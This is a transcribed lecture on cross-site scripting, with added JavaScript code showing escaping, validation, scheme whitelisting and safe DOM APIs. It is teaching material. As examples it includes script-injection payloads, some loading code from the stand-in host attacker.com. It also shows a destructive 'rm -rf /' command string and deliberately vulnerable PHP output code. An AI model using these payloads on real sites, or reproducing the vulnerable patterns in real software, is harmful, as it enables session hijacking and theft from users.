Transcription

Computer Security Course. Dawn Song
Web Security: Vulnerabilities & Attacks

Cross-site Scripting

What is Cross-site Scripting (XSS)?
A vulnerability in a web application that enables attackers to inject client-side scripts into web pages viewed by other users.

Three Types of XSS
- Type 2: Persistent or Stored
  – The attack vector is stored at the server
- Type 1: Reflected
  – The attack value is 'reflected' back by the server
- Type 0: DOM Based
  – The vulnerability is in the client side code

Consider a form on safebank.com that allows a user to chat with a customer service associate.

[Diagram: User, Server and Associate; the SAFEBANK page with login/password, Accounts, Bill Pay, Mail, Transfers and banking content]

1. User asks a question via HTTP POST (message: "How do I get a loan?")
2. Server stores question in database.
3. Associate requests the questions page
4. Server retrieves all questions from the DB
5. Server returns HTML embedded with the question

PHP code:

    <? echo "<div class='question'>$question</div>"; ?>

HTML code:

    <div class='question'>"How do I get a loan?"</div>

The associate's page then shows the stored question: Customer5: "How do I get a loan?"

Type 2 XSS Injection
Look at the following code fragments. Which one of these could possibly be a comment that could be used to perform a XSS injection?
a. '; system('rm -rf /');
b. rm -rf /
c. DROP TABLE QUESTIONS;
d. <script>doEvil()</script>

Script Injection
With option d as the stored comment, the page the server returns becomes:

    <html><body>
    ...
    <div class='question'><script>doEvil()</script></div>
    ...
    </body></html>

Stored XSS

[Diagram: Attacker, Server and Victim; the SAFEBANK page with login/password, Accounts, Bill Pay, Mail, Transfers and banking content]

1. Attacker asks malicious question via HTTP POST (message: "<script>doEvil()</script>")
2. Server stores question in database
3. Victim requests the questions page
4. Server retrieves malicious question from the DB
5. Server returns HTML embedded with malicious question

PHP code:

    <? echo "<div class='question'>$question</div>"; ?>

HTML code:

    <div class='question'><script>doEvil()</script></div>

The victim's page shows only "Customer5:"; the injected script runs in the victim's browser instead of being displayed.


Example Continued: Blog
- safebank.com also has a transaction search interface at search.php
- search.php accepts a query and shows the results, with a helpful message at the top.

    <? echo "Your query {$_GET['query']} returned $num results."; ?>

- Example: Your query chocolate returned 81 results.
  safebank.com/search.php?query=chocolate
  [SAFEBANK page: "Your query chocolate returned 81 results." followed by the results]
- What is a possible malicious URI an attacker could use to exploit this?

Type 1: Reflected XSS
A request to "search.php?query=<script>doEvil()</script>" causes script injection. Note that the query is never stored on the server, hence the term 'reflected'.

PHP code:

    <? echo "Your query {$_GET['query']} returned $num results."; ?>

HTML code:

    Your query <script>doEvil()</script> returned 0 results

But this only injects code in the attacker's page. The attacker needs to inject code in the user's page for the attack to be effective.

Reflected XSS

[Diagram: Attacker, User (email client) and Vulnerable Server; the SAFEBANK page with login/password, Accounts, Bill Pay, Mail, Transfers and banking content]

1. Send Email with malicious link: safebank.com/search.php?query=<script>doEvil()</script>
2. User clicks on link with malicious params
3. Server inserts malicious params into HTML: Your query <script>doEvil()</script> returned 0 results
4. HTML with injected attack code is returned to the user
5. Execute embedded malicious script.


Type 0: DOM Based XSS
- Traditional XSS vulnerabilities occur in the server side code, and the fix involves improving sanitization at the server side.
- Web 2.0 applications include significant processing logic, at the client side, written in JavaScript.
- Similar to the server, this code can also be vulnerable.
- When the XSS vulnerability occurs in the

Type 0: DOM Based XSS
Suppose safebank.com uses client side code to display a friendly welcome to the user. For example, the following code shows "Hello Joe" if the URL is http://safebank.com/welcome.php?name=Joe

    Hello
    <script>
    var pos = document.URL.indexOf("name=") + 5;
    document.write(document.URL.substring(pos, document.URL.length));
    </script>

Type 0: DOM Based XSS
For the same example, which one of the following URIs will cause untrusted script execution?
a. http://attacker.com
b. http://safebank.com/welcome.php?name=doEvil()
c. http://safebank.com/welcome.php?name=<script>doEvil()</script>


DOM-Based XSS

[Diagram: Attacker, User (email client) and Vulnerable Server; the SAFEBANK page with login/password, Accounts, Bill Pay, Mail, Transfers and banking content]

1. Send Email with malicious link: safebank.com/welcome.php?query=<script>doEvil()</script>
2. User clicks on link with malicious params
3. Server uses the params in a safe fashion, or ignores the malicious param
4. Safe HTML is returned to the user
5. JavaScript code ON THE CLIENT uses the malicious params in an unsafe manner, causing

Exploiting a DOM Based XSS
- The attack payload (the URI) is still sent to the server, where it might be logged.
- In some web applications, the URI fragment is used to pass arguments
  – E.g., Gmail, Twitter, Facebook
- Consider a more Web 2.0 version of the previous example: http://example.net/welcome.php#name=Joe
  – The browser doesn't send the fragment "#name=Joe" to the server as part of the HTTP Request
  – The same attack still exists
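The following is an added example, not code from the lecture, that makes the query-versus-fragment distinction concrete. It models the welcome page's client-side logic as a function over the URL string (the slide's code reads document.URL and writes with document.write), shows what part of the URL the server ever receives, and gives a hardened version that parses the parameter properly and whitelists it. Node's WHATWG URL class is used; the URLs and the function names are constructed for this example.

```javascript
// Added example (not from the lecture): what the server receives versus what
// client-side code can read when a DOM-based XSS payload travels in the query
// string or in the URL fragment. All URLs below are constructed.

// The request line carries path + query; the fragment never leaves the browser.
function serverSeesFromUrl(href) {
  const u = new URL(href);
  return u.pathname + u.search;
}

// The slide's vulnerable client-side logic as a pure function over the URL
// string (instead of document.URL + document.write) so it runs outside a
// browser. Whatever follows "name=" is returned as markup, query or fragment alike.
function vulnerableWelcomeMarkup(href) {
  const pos = href.indexOf("name=") + 5;
  return "Hello " + href.substring(pos, href.length);
}

// Hardened version: parse the parameter (from ?name= or #name=), whitelist the
// characters a name may contain, and return plain text meant for textContent.
function safeWelcomeText(href) {
  const u = new URL(href);
  const params = new URLSearchParams(u.search || u.hash.replace(/^#/, ""));
  const name = params.get("name") || "";
  if (!/^[A-Za-z][A-Za-z .'-]{0,39}$/.test(name)) return "Hello";
  return "Hello " + name;
}

// Stand-alone demonstration with a constructed payload.
const DEMO_PAYLOAD = "<script>doEvil()</script>";
const DEMO_VIA_QUERY = "http://safebank.com/welcome.php?name=" + DEMO_PAYLOAD;
const DEMO_VIA_FRAGMENT = "http://example.net/welcome.php#name=" + DEMO_PAYLOAD;
console.log("server sees (query):    " + serverSeesFromUrl(DEMO_VIA_QUERY));
console.log("server sees (fragment): " + serverSeesFromUrl(DEMO_VIA_FRAGMENT));
console.log("vulnerable client:      " + vulnerableWelcomeMarkup(DEMO_VIA_FRAGMENT));
console.log("hardened client:        " + safeWelcomeText(DEMO_VIA_FRAGMENT));
```

With the payload in the fragment, serverSeesFromUrl returns only "/welcome.php", so no server-side log or filter ever sees the script, while vulnerableWelcomeMarkup still hands it to the page as markup. The hardened version rejects it and would be assigned with textContent rather than document.write.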


Contexts in HTML
- Cross site scripting is significantly more complex than command or SQL injection.
- The main reason for this is the large number of contexts present in HTML.

    <a href="http://evil.com" onclick="functionCall()">Possibly <b>HTML</b> Text</a>

Contexts in this fragment: the href value is in the URI context (inside an HTML attribute context), the onclick value is in the event handler context, and the element content "Possibly <b>HTML</b> Text" is in the HTML context.

HTML Contexts
The blogging application also accepts a 'homepage' from the anonymous commenter. The application uses this value to display a helpful link:

    <? echo "<a href='" . $homepage . "'>Home</a>"; ?>

Which of the following values for homepage cause untrusted code execution?
a. <script src="http://attacker.com/evil.js"></script>
b. '><script src="http://attacker.com/evil.js"></script>
c. javascript:alert("evil code executing");


Injection Defenses
- Input validation
  – Whitelists untrusted inputs.
- Input escaping
  – Escape untrusted input so it will not be treated as a command.
- Use less powerful API
  – Use an API that only does what you want.
  – Prefer this over all other options.

Input Validation
Check whether the input value follows a whitelisted pattern. For example, if accepting a phone number from the user, JavaScript code to validate the input to prevent server-side XSS:

    function validatePhoneNumber(p) {
        var phoneNumberPattern = /^\(?(\d{3})\)?[- ]?(\d{3})[- ]?(\d{4})$/;
        return phoneNumberPattern.test(p);
    }

This ensures that the phone number doesn't contain a XSS attack vector or a SQL Injection attack. This only works for inputs that are easily restricted.
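The block below is an added example (not the lecture's code) built around the slide's phone-number check. It keeps the anchored pattern, places an unanchored copy beside it to show what the ^ and $ anchors buy, and adds a server-side handler that re-runs the same check, because a POST body can be written by hand and the browser-side check skipped entirely. The sample inputs and the helper names are constructed.

```javascript
// Added example (not from the lecture): whole-string whitelist validation of a
// phone number, the same pattern without anchors for comparison, and the
// server-side re-check that must exist regardless of client-side JavaScript.
const PHONE_ANCHORED = /^\(?(\d{3})\)?[- ]?(\d{3})[- ]?(\d{4})$/;
const PHONE_UNANCHORED = /\(?(\d{3})\)?[- ]?(\d{3})[- ]?(\d{4})/;

// The slide's validatePhoneNumber: the whole string must match the pattern.
function validatePhoneNumber(p) {
  return typeof p === "string" && PHONE_ANCHORED.test(p);
}

// Same pattern without ^ and $: a substring match, so trailing junk passes.
function validatePhoneNumberUnanchored(p) {
  return typeof p === "string" && PHONE_UNANCHORED.test(p);
}

// What the server does with the posted value: validate again, then normalise
// to digits so storage and later output are predictable.
function serverHandlePhoneSubmission(postedPhone) {
  if (!validatePhoneNumber(postedPhone)) {
    return { accepted: false, stored: null };
  }
  return { accepted: true, stored: postedPhone.replace(/\D/g, "") };
}

// Constructed samples: three well-formed numbers and two injection attempts,
// one of them hiding behind a valid-looking prefix.
const PHONE_SAMPLES = [
  "(555) 123-4567",
  "555-123-4567",
  "5551234567",
  "555-123-4567<script>doEvil()</script>",
  "'; DROP TABLE QUESTIONS;",
];
for (const s of PHONE_SAMPLES) {
  console.log(
    JSON.stringify(s),
    "anchored:", validatePhoneNumber(s),
    "unanchored:", validatePhoneNumberUnanchored(s),
    "server:", JSON.stringify(serverHandlePhoneSubmission(s))
  );
}
```

The fourth sample passes the unanchored check because a valid number appears somewhere inside it; only the anchored pattern rejects it. The server handler shows where the check has to live for it to count.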

Parameter Tampering
Is the JavaScript check in the previous function on the client sufficient to prevent XSS attacks?
a. Yes
b. No


Input Escaping or Sanitization
Sanitize untrusted data before outputting it to HTML. Consider the htmlentities function, which escapes 'special' characters. For example, < becomes &lt;.
Our previous attack input,

    <script src="http://attacker.com/evil.js"></script>

becomes

    &lt;script src=&quot;http://attacker.com/evil.js&quot;&gt;&lt;/script&gt;

which shows up as text in the browser.
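As an added example (not the lecture's code), the following Node script models the two PHP outputs from the stored and reflected examples, the questions list and search.php's message line, rendered first by raw concatenation as on the slides and then through an htmlentities-style escape (the ENT_QUOTES behaviour, so both quote characters are encoded). The function names, the escape table and the sample inputs are constructed for this example.

```javascript
// Added example (not from the lecture): raw versus escaped rendering of the two
// sinks shown on the slides. Sample questions and queries are constructed.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };

// Escape the five characters that change meaning in HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Stored-question sink: echo "<div class='question'>$question</div>";
function renderQuestionsUnsafe(questions) {
  return questions.map((q) => `<div class='question'>${q}</div>`).join("\n");
}
function renderQuestionsSafe(questions) {
  return questions.map((q) => `<div class='question'>${escapeHtml(q)}</div>`).join("\n");
}

// Reflected sink: echo "Your query {$_GET['query']} returned $num results.";
function renderSearchMessageUnsafe(query, num) {
  return `Your query ${query} returned ${num} results.`;
}
function renderSearchMessageSafe(query, num) {
  return `Your query ${escapeHtml(query)} returned ${Number(num) || 0} results.`;
}

// Crude check for what a browser would execute from the output: a live script tag.
function containsLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration with the slide's attack input (constructed here).
const ATTACK = '<script src="http://attacker.com/evil.js"></script>';
console.log("--- unsafe questions page ---");
console.log(renderQuestionsUnsafe(["How do I get a loan?", ATTACK]));
console.log("--- escaped questions page ---");
console.log(renderQuestionsSafe(["How do I get a loan?", ATTACK]));
console.log("--- escaped search message ---");
console.log(renderSearchMessageSafe("<script>doEvil()</script>", 0));
```

The escaped outputs contain no live script tag: the browser renders the entity sequence as the literal text of the payload, which is exactly what the slide describes. Escaping the count separately (Number(num)) keeps a second, numeric value from becoming a markup injection point.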

Context Sensitive Sanitization
What is the output of running htmlentities on javascript:evilfunction();? Is it sufficient to prevent cross site scripting? You can try out htmlentities online.
a. Yes
b. No

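The following is an added example, not the lecture's code, that works the 'homepage' link from the HTML Contexts quiz and the htmlentities question together. It renders the link with HTML escaping only, then with a URL-scheme whitelist applied before escaping, and reads back which scheme the browser would navigate to on click. The escape helper, the whitelist function and the test inputs are constructed for this example; the quiz's values are used as the inputs.

```javascript
// Added example (not from the lecture): HTML escaping alone in the href (URI)
// context versus a scheme whitelist plus escaping. Inputs are constructed.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// echo "<a href='" . $homepage . "'>Home</a>"; with htmlentities applied to $homepage.
function renderHomepageLinkEscapedOnly(homepage) {
  return `<a href='${escapeHtml(homepage)}'>Home</a>`;
}

// Accept only absolute http(s) URLs; null for anything else (javascript:, data:,
// relative paths, unparsable input). The URL parser also strips leading whitespace
// and lowercases the scheme, so case and padding tricks do not slip past.
function safeHomepageUrl(homepage) {
  let u;
  try {
    u = new URL(String(homepage));
  } catch (e) {
    return null;
  }
  return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
}

// Scheme check first (URI context), then escaping (attribute context).
function renderHomepageLinkSafe(homepage) {
  const url = safeHomepageUrl(homepage);
  return url === null ? "" : `<a href='${escapeHtml(url)}'>Home</a>`;
}

// Scheme of the href a browser would follow, read back from the rendered markup;
// null if there is no single-quoted href or it carries no scheme.
function renderedHrefScheme(html) {
  const m = /href='([^']*)'/.exec(html);
  if (!m) return null;
  const s = /^\s*([A-Za-z][A-Za-z0-9+.-]*):/.exec(m[1]);
  return s ? s[1].toLowerCase() + ":" : null;
}

// Stand-alone demonstration with the quiz's three inputs.
const HOMEPAGE_INPUTS = [
  '<script src="http://attacker.com/evil.js"></script>',
  '\'><script src="http://attacker.com/evil.js"></script>',
  'javascript:alert("evil code executing");',
  "https://example.com/",
];
for (const h of HOMEPAGE_INPUTS) {
  console.log("escaped only:", renderHomepageLinkEscapedOnly(h), "->", renderedHrefScheme(renderHomepageLinkEscapedOnly(h)));
  console.log("whitelisted: ", JSON.stringify(renderHomepageLinkSafe(h)));
}
```

Escaping stops inputs a and b, which depend on breaking out of the attribute, but input c survives it: the browser decodes &quot; inside the attribute and the href still begins with javascript:, so the link runs the script when clicked. Only the scheme whitelist handles the URI context.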

Use a less powerful API
- The current HTML API is too powerful: it allows arbitrary scripts to execute at any point in HTML.
- Content Security Policy allows you to disable all inline scripting and restrict external script loads.
- Disabling inline scripts, and restricting script loads to 'self' (own domain), makes XSS a lot harder.
- See the CSP specification for more details.

Use a less powerful API
- To protect against DOM based XSS, use a less powerful JavaScript API.
- If you only want to insert untrusted text, consider using the innerText API in JavaScript. This API ensures that the argument is only used as text.
- Similarly, instead of using innerHTML to insert untrusted HTML code, use createElement to create individual HTML tags and use innerText on each.
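As an added example (not the lecture's code), the block below builds the questions list the two ways the slide contrasts: an innerHTML assignment of concatenated markup, and createElement plus a text-only property (textContent is used here; it is the standards-track sibling of the slide's innerText and behaves the same for this purpose). Both renderers take the document as a parameter so the same code runs in a browser (pass document) and against the small DOM stub defined in the block, which only records what each API would receive. The stub, the helper names and the sample questions are constructed for this example.

```javascript
// Added example (not from the lecture): innerHTML versus createElement +
// textContent for inserting untrusted strings. Runs in a browser with the real
// document or, stand-alone, with the stub below.

// Stub of just enough DOM for this demonstration: an element keeps a child list,
// a text value, and whatever string was assigned to innerHTML.
function stubDocument() {
  return {
    createElement(tagName) {
      return {
        tagName,
        className: "",
        textContent: "",
        innerHTML: "",
        children: [],
        appendChild(child) { this.children.push(child); return child; },
      };
    },
  };
}

// innerHTML sink: the string is parsed as markup, so a <script> inside a
// question becomes a script element in the page.
function renderQuestionsUnsafe(container, questions) {
  container.innerHTML = questions.map((q) => `<div class="question">${q}</div>`).join("");
  return container;
}

// textContent sink: each question becomes a text node under its own div; the
// string is never parsed, so "<script>" is just characters on screen.
function renderQuestionsSafe(doc, container, questions) {
  for (const q of questions) {
    const div = doc.createElement("div");
    div.className = "question";
    div.textContent = String(q);
    container.appendChild(div);
  }
  return container;
}

// Inspection helpers that work on a real container or the stub.
function scriptMarkupAssigned(container) {
  return /<script\b/i.test(container.innerHTML || "");
}
function questionTexts(container) {
  return Array.from(container.children).map((c) => c.textContent);
}

// Stand-alone demonstration with a constructed payload.
const DEMO_DOC = stubDocument();
const DEMO_QUESTIONS = ["How do I get a loan?", "<script>doEvil()</script>"];
const unsafeBox = renderQuestionsUnsafe(DEMO_DOC.createElement("div"), DEMO_QUESTIONS);
const safeBox = renderQuestionsSafe(DEMO_DOC, DEMO_DOC.createElement("div"), DEMO_QUESTIONS);
console.log("innerHTML received:", unsafeBox.innerHTML);
console.log("script markup assigned (unsafe):", scriptMarkupAssigned(unsafeBox));
console.log("script markup assigned (safe):  ", scriptMarkupAssigned(safeBox));
console.log("text nodes in safe container:", questionTexts(safeBox));
```

In a real page the safe container shows the second question literally as the text "<script>doEvil()</script>" and never creates a script element; the unsafe one hands the payload to the HTML parser. Keeping the data path text-only is the "less powerful API" the slide recommends.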
